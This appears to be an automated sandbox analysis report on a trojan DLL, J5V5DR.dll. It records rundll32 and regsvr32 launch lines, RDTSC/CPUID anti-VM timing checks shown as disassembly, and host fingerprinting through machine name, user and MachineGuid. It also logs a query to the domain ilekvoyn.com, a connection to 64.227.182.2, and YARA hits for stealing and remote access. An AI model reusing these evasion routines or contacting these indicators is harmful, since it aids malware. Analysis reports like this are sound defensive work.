Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree, 0_2_000000018000108C
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_00007FFC66B0542B NtMapViewOfSection,NtCreateSection, 2_2_00007FFC66B0542B
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_000000018000108C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_000000018000108C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree, 4_2_000000018000108C
Source: J5V5DR.dll Virustotal: Detection: 13%
Source: J5V5DR.dll ReversingLabs: Detection: 12%
Source: J5V5DR.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\J5V5DR.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winDLL@13/0@4/1
Source: C:\Windows\System32\loaddll64.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll64.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: J5V5DR.dll Static PE information: Image base 0x180000000 > 0x60000000
Source: J5V5DR.dll Static PE information: DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: J5V5DR.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC65B1251D push rax; ret 0_2_00007FFC65B12525
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_00007FFC66B0251D push rax; ret 2_2_00007FFC66B02525
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll
Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree, 0_2_000000018000108C
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\regsvr32.exe RDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\regsvr32.exe RDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\loaddll64.exe RDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\loaddll64.exe RDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_0000000180002AC0 SwitchToThread,SwitchToThread, 0_2_0000000180002AC0
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_0000000180002AC0 SwitchToThread,SwitchToThread, 2_2_0000000180002AC0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180002AC0 SwitchToThread,SwitchToThread, 3_2_0000000180002AC0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180002AC0 SwitchToThread,SwitchToThread, 4_2_0000000180002AC0
Source: C:\Windows\System32\loaddll64.exe TID: 5132 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 6940 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_000000018000133C
Source: C:\Windows\System32\regsvr32.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_000000018000133C
Source: C:\Windows\System32\rundll32.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_000000018000133C
Source: C:\Windows\System32\rundll32.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 4_2_000000018000133C
Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_0000000180002174 rdtsc 0_2_0000000180002174
Source: C:\Windows\System32\loaddll64.exe Process information queried: ProcessInformation Jump to behavior
Source: rundll32.exe, 00000003.00000002.279011932.000001D397AA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPK
Source: rundll32.exe, 00000004.00000002.279392364.000001EDE5D2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%
Source: loaddll64.exe, 00000000.00000002.306438498.00000239D2D35000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.306399602.00000239D2CF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278392013.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279042528.000001D397AD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279392364.000001EDE5D2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279346138.000001EDE5CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: loaddll64.exe, 00000000.00000002.306426714.00000239D2D1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWB4
Source: regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279042528.000001D397AD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree, 0_2_000000018000108C
Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_0000000180001C28
Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_0000000180002174 rdtsc 0_2_0000000180002174

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\rundll32.exe Domain query: ilekvoyn.com
Source: C:\Windows\System32\rundll32.exe Network Connect: 64.227.182.2 80 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1 Jump to behavior
Source: rundll32.exe, 00000003.00000002.278654277.000000BC44AEC000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: User32advapi32@Shell_TrayWndcK
Source: loaddll64.exe, 00000000.00000002.306193512.000000AFC938C000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278077468.00000000006FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000004.00000002.278897415.0000007244FCC000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: User32advapi32@Shell_TrayWnd
Source: C:\Windows\System32\loaddll64.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW, 0_2_0000000180002018

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
Source: Yara match File source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE

Remote Access Functionality

barindex
Source: Yara match File source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
Source: Yara match File source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs